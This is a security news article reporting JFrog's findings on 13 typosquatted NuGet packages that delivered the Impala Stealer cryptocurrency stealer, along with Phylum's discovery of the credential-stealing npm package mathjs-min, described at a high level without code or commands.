Experts in cybersecurity have uncovered the mechanics behind a cryptocurrency stealer malware distributed through 13 malignant NuGet packages. This supply chain attack targeted .NET developers and employed a sophisticated typosquatting campaign. Impersonating legitimate packages, the attackers executed PowerShell code to obtain a secondary binary from a pre-programmed server.
The two-stage assault led to the deployment of a .NET-based persistent backdoor called Impala Stealer, which can access users’ cryptocurrency accounts without authorization. JFrog, who reported the campaign last month, stated that the malware used a unique obfuscation method known as “.NET AoT compilation.” This technique is stealthier and more challenging to reverse engineer than standard obfuscators.
.NET AoT compilation is an optimization process that compiles apps to native code ahead of time. These native AOT applications have faster startup times, reduced memory usage, and can run without .NET runtime installed. The second-stage payload includes an auto-update feature that retrieves updated versions of the executable remotely. It maintains persistence by injecting JavaScript code into Discord or Microsoft Visual Studio Code apps, initiating the cryptocurrency stealer malware binary.
This binary then seeks the Exodus Wallet desktop application, inserting JavaScript code into various HTML files to collect and send sensitive data to a predefined Discord webhook. Although the JavaScript snippet has since been removed from an online paste website, it is believed to have been used for stealing user credentials and accessing other valuable information.
Shachar Menashe, a senior director at JFrog Security Research, explained that the attackers used typosquatting tactics to deploy a custom malicious payload targeting the Exodus crypto wallet. They leaked the victims’ credentials to cryptocurrency exchanges via code injection. Menashe emphasized that no open-source software repository is entirely trustworthy, and developers should implement safety measures throughout the software development lifecycle to secure the software supply chain.
These revelations follow the discovery of a malicious npm package called mathjs-min by security firm Phylum. Uploaded to the repository on March 26, 2023, it contained a credential stealer targeting Discord passwords from the official app and web browsers such as Google Chrome, Brave, and Opera. The package is a modified version of the popular JavaScript math library mathjs, which was injected with malicious code and published to NPM as a seemingly minified version of the genuine library.